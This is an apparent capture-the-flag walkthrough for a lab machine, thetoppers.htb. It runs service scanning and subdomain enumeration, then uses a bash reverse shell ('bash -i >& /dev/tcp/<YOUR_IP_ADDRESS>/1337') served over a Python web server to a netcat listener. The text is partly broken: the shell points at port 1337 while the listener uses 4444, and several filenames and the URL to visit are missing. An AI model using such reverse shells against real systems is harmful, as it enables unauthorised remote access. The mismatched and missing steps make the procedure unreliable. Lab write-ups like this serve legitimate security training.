top of page


As usual, let's start with map

nmap -sV targetIP

There is a website on port 80, open your browser and type the target IP (in this case

Scroll down and we find this domain name thetoppers.htb

Let's use the word list subdomains-top1million-5000.txt already located on your Parrot VM to enumerate any subdomains

gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb 

We found a subdomain called s3.thetoppers.htb

Open your browser and go to s3.thetoppers.htb

Find out what your IP is using


Check out the IP in tun0

Create a new bash file called

bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1 

Open a new terminal window and start listening with net cat on one window

nc -lnvp 4444

Create a web server using the command below (make sure you are in the same directory as where is located)

python3 -m http.server 8000 

Go back to the browser and type in the url bar


The flag is located at var/www/flag.txt


34 views0 comments

Recent Posts

See All



bottom of page